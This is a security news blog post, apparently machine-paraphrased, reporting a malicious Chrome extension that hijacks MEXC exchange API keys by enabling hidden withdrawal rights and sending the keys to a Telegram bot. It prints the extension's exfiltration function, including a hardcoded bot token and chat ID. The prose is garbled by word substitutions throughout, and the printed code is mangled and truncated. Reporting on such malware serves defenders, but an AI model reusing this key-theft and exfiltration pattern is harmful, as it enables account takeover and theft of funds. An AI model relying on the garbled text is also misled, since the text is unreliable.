Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

Posted on January 13, 2026January 13, 2026 By CWS

A malicious Chrome extension referred to as MEXC API Automator is abusing belief in browser add-ons to steal cryptocurrency buying and selling entry from MEXC customers.

Posed as a software that helps automate buying and selling and API key creation, it quietly takes management of newly created API keys and turns a traditional browser session right into a full account takeover channel.

The assault begins from a legitimate-looking Chrome Internet Retailer itemizing that guarantees “simple API key creation with buying and selling and withdrawal entry” for the MEXC alternate.

As soon as put in, the extension prompts when the sufferer opens MEXC’s API administration web page, the place customers usually create keys for bots and automatic buying and selling.

From there, it could possibly silently create highly effective keys, set off trades, and allow withdrawals throughout a worldwide consumer base.

MEXC interface (Supply – Socket.dev)

In addition to this, the MEXC interface that focused customers see as regular throughout this course of.

After reviewing the extension, Socket.dev researchers recognized it as outright malware and linked it to a risk actor utilizing the deal with jorjortan142.

Their evaluation confirmed that the code runs solely contained in the already logged-in MEXC session, which implies conventional password theft will not be even wanted.

The API automator highlights how the Chrome Internet Retailer branding is used to construct belief.

As an alternative of stealing passwords, the extension focuses on MEXC API keys that permit each buying and selling and withdrawals. These keys typically reside for a very long time, are reused in bots and scripts, and aren’t watched as intently as interactive logins.

As quickly as a recent key seems within the success popup, the extension grabs it and prepares it for exfiltration to attacker-controlled Telegram infrastructure.

Ai scanner detection (Supply – Socket.dev)

This report now appears to be like at how the extension infects the browser session, hides harmful settings, and sends stolen knowledge out within the background. The scanner detection reveals Socket AI Scanner flagging this conduct contained in the extension code.

An infection Mechanism, UI Deception, and Telegram Exfiltration

MEXC API Automator is a Manifest V3 Chrome extension that injects a single content material script, script.js, into the URL sample ://.mexc.com/consumer/openapi*.

When the sufferer opens this web page, the script waits for the DOM to load, finds the API creation type, and programmatically selects all permission checkboxes, together with withdrawals, with none additional clicks from the consumer.

To idiot the sufferer, the script then tampers with the web page types so the withdrawal choice appears to be like disabled although it stays enabled on the server facet.

It strips the “checked” class from the withdraw checkbox, hides the visible tick mark with injected CSS, and makes use of a MutationObserver to take away the category once more if MEXC’s personal code restores it.

The sufferer thinks solely buying and selling is allowed, however the submitted type truly carries full withdrawal rights.

When the alternate reveals the success modal with the brand new Entry Key and Secret Key, the script scrapes each values straight from the DOM and sends them to a hardcoded Telegram bot and chat ID within the background.

The core of this conduct seems in a easy operate:-

operate sendKeysToTelegram(apiKey, secretKey) {
const botToken = ‘7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I’;
const chatId = ‘6526634583’;
fetch(` {
technique: ‘POST’,
headers: { ‘Content material-Sort’: ‘software/json’ },
physique: JSON.stringify({ chat_id: chatId, textual content: `API Key: ${apiKey}nSecret Key: ${secretKey}` })
});
}

For the reason that extension stays contained in the browser sandbox, reads solely web page content material, and sends knowledge over regular HTTPS, it blends into common internet site visitors.

By the point a sufferer notices unusual trades or lacking funds, the attacker has already loaded the keys into scripts or instruments that may drain accounts with out ever touching the consumer’s password.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Automated, Chrome, Credentials, Enables, Extension, Login, Malicious, Steals, Trading, Wallet

Post navigation

Previous Post: Hackers Infiltrated n8n’s Community Node Ecosystem With a Weaponized npm Package
Next Post: Multiple Hikvision Vulnerabilities Let Attackers Cause Device Malfunction Using Crafted Packets

Related Posts

Here’s How to Solve It  Cyber Security News
AI Tools Like GPT Direct Users to Phishing Sites Instead of Legitimate Ones Cyber Security News
Indonesia’s Gambling Ecosystem Exposed With Indicators of National-Level Cyber Operations Cyber Security News
Microsoft Investigates Defender Portal Access Issues Following Traffic Spike Cyber Security News
CISA Warns of Microsoft SharePoint server 0-Day RCE Vulnerability Exploited in Wild Cyber Security News
Hackers Exploit AWS IAM Eventual Consistency for Persistence Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • New Angular Vulnerability Enables an Attacker to Execute Malicious Payload
  • Cyber Fraud Overtakes Ransomware as Top CEO Concern: WEF 
  • CISA Warns of Active Exploitation of Gogs Vulnerability Enabling Code Execution
  • Multiple Hikvision Vulnerabilities Let Attackers Cause Device Malfunction Using Crafted Packets
  • Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • New Angular Vulnerability Enables an Attacker to Execute Malicious Payload
  • Cyber Fraud Overtakes Ransomware as Top CEO Concern: WEF 
  • CISA Warns of Active Exploitation of Gogs Vulnerability Enabling Code Execution
  • Multiple Hikvision Vulnerabilities Let Attackers Cause Device Malfunction Using Crafted Packets
  • Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark